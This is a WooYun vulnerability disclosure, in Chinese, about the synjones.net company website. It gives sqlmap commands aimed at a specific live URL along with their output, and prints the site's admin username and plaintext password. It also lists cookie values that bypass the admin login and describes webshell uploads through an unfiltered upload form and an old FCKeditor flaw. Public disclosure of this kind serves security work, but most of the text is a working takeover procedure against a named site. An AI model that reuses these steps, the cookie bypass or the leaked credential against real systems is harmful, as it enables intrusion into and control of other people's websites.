WooYun.org

一、SQL注入
在检测新中新的官网时，发现了一处可以sql注入的地方，其实有很多--，果断放到sqlmap上跑，
./sqlmap.py -u http://www.synjones.net/MContent/EasySetup.aspx?type=123 --schema --exclude-sysdbs
sqlmap/1.0-dev-14b2d4c - automatic SQL injection and database takeover tool
http://sqlmap.org
[19:54:36] [INFO] resuming back-end DBMS 'microsoft sql server'
[19:54:36] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
然后得到了若干数据库，FB0002, FB0003, FB0004, FB0005, FB0006, FB0007, FB0008, FB0009, FB0010, FB0011, FB0012, FB0013, FB0014, FB0015, FB0016, FB0017, FB0018, FB0019, FB0020, FB0021, FB0022, FB0023, FB0024, FB0025, FB0026, FB0027, FB0028, FB0029, FB0030, FB0032, FB0033, FB0034, FB0035, FB0036, FB0037, FB0038, FB0040, FB0041, FB0042, FB0043, FB0044, FB0045, FB0046, FB0047, FB0048, FB0049, FB0050, FB0051, FB0052, FB0053, FB0054, FB0055, FB0056, FB0057, FB0058, FB0059, FB0060, FB0061, FB0062, FB0063, FB0064, FB0065, FB0066, FB0067, FB0068, FB0069, FB0070, FB0071。。。。
使用./sqlmap.py -u http://www.synjones.net/MContent/EasySetup.aspx?type=123 --current-db找到了当前的数据库hwt0162，然后从数据库里找到T_Admin这个表，读出后台管理员的账号密码：
+----------+----------+
| Username | Password |
+----------+----------+
| admin | companycn!@# |
+----------+----------+
登陆后台http://www.synjones.net/hwtUserAdmin/admin/login.aspx，
发现在上传文件，没有对其过滤，于是，上传一个aspx木马文件，可以得到webshell。

二、后台管理验证只使用了cookie判断
因此，不需要输入密码，只是修改cookie成为管理员登陆后的cookie，就能管理所有使用此管理系统的网站了，上传文件又没有限制，拿webshell异常简单。另外后台可以直接看到各个管理员的明文密码。
修改如下cookie：
AdminCookie :admin
DownCookie
MediaCookie
NewsCookie
PhotoCookie
ProCookie
其中，后面5个的值可以设为空格，但不能不设，否则会报错。
同上，在上传文件的地方上传webshell即可。
三、由于使用了2.4版本的FckEditor，加上IIS6.0解析问题，所以按照以前的Fckeditor的漏洞上传webshell也是行。